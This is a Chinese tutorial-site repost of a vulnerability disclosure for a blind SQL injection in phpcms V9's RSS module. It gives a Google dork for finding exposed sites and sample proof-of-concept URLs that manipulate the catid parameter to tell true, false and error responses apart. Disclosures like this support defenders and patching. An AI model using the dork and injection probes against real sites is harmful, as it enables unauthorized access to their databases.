phpcms V9 BLind SQL 注入漏洞0day_漏洞分析教程-查字典教程网
phpcms V9 BLind SQL 注入漏洞0day
phpcms V9 BLind SQL 注入漏洞0day
发布时间:2016-12-21 来源:查字典编辑
摘要:影响版本:phpcmsv9blind官方网站:http://www.phpcms.cn漏洞类型:SQL注入漏洞描述:phpcmsv9blin...

影响版本:phpcms v9 blind

官方网站:http://www.phpcms.cn

漏洞类型:SQL注入

漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。

google dork:inurl:"index.php?m=content+c=rss+catid=10"

exploit & p0c

[!] index.php?m=content&c=rss&catid=[valid catid]

Example p0c

[!] http://host/index.php?m=content&c=rss&catid=10 <= True

[!] http://host/index.php?m=content&c=rss&catid=-10 <= False

[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新漏洞分析学习
    热门漏洞分析学习
    网络安全子分类